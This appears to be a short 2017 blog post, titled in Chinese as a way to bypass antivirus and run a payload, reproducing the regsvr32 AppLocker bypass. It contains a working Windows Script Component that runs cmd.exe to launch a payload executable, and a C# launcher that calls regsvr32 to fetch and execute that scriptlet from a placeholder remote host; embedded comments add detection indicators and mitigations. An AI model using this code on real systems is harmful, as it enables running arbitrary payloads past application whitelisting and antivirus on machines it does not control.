绕过杀软执行payload

作者: admin 分类: 未分类 发布时间: 2017-08-02 11:11
https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
//exploit/windows/misc/regsvr32_applocker_bypass_server


<?XML version="1.0"?>
<!--
  Windows Script Component (.sct) served over HTTP and consumed by
  "regsvr32 /s /n /u /i:<url> scrobj.dll" (see the C# launcher further
  down the page). The <registration> element's progid/classid are the
  COM identity scrobj.dll registers; the JScript inside it runs as part of
  that registration step, so loading the file is enough to execute it.
  Defender notes: regsvr32 fetching a remote .sct is MITRE ATT&CK T1218.010
  (Regsvr32); the observable artefacts are regsvr32 with a URL in /i:,
  an outbound HTTP request from regsvr32, and a cmd.exe child process.
-->
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- WScript.Shell.Run launches cmd.exe, changes to C:\ and starts
     pentestlab.exe (the payload name used in the linked post). -->
<script language="JScript">
 
<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe"); 
]]>
 
</script>
</registration>
</scriptlet>

==============================================
using System;
using System.Runtime.InteropServices;

namespace Regsvr

// Minimal launcher: the managed binary itself contains no payload; it only
// shells out to regsvr32 so that the script-component host (scrobj.dll)
// does the fetching and execution of the remote .sct above.
{ public class CMD
	// P/Invoke binding to the C runtime's system(), which hands the string
	// to the command interpreter. Using msvcrt.dll rather than
	// System.Diagnostics.Process keeps the CLR's process-start path out of
	// the picture; the child is still a cmd.exe spawned by this process.
	{ [DllImport("msvcrt.dll")]
		public static extern int system(string cmd);
		// regsvr32 switches as used here:
		//   /s  silent, no message boxes
		//   /n  do not call DllRegisterServer
		//   /u  unregister (DllUninstall / DllUnregisterServer path)
		//   /i: string passed to DllInstall - for scrobj.dll this is the
		//       scriptlet URL, which it is expected to download and run
		//       (the behaviour the linked blog post relies on)
		// "public_ip:port/file.sct" is a placeholder the operator fills in.
		// Detection: a regsvr32 command line containing "/i:http" together
		// with "scrobj.dll", regsvr32 opening a network connection, and
		// regsvr32 spawning cmd.exe are the indicators; blocking regsvr32
		// or scrobj.dll via AppLocker/WDAC rules is the usual mitigation.
		public static void Main()
		{ system("regsvr32 /s /n /u /i:http://public_ip:port/file.sct scrobj.dll");
		}}}